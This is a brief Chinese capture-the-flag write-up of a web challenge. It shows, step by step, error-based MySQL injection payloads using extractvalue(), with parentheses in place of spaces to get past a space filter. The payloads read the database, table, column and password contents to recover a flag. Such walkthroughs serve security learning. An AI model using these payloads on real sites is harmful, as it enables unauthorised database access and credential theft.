技術標籤：web

嘗試了一下發現空格在內的好多東西都被過濾掉了

學到了報錯注入（空格用括號代替）

1'or(extractvalue(1,concat(0x7e,database())))#

得到庫geek

'or(extractvalue(1,concat(0x7e,(select(table_name)from(information_schema.tables)where(table_schema)like("geek")))))#

得到表

'or(extractvalue(1,concat(0x7e,(select(group_concat(column_name)
 
)from(information_schema.columns)where(table_name)like("H4rDsq1")))))#

得到列

'or(extractvalue(1,concat(0x7e,(select(group_concat(password,20))from(H4rDsq1)where(id)like(1)))))#

查內容

只有一半flag，從右顯示得到另一半

'or(extractvalue(1,concat(0x7e,(select(right(password,20))from(H4rDsq1)where(id)like(1)))))#
 

拼到一起得到完整flag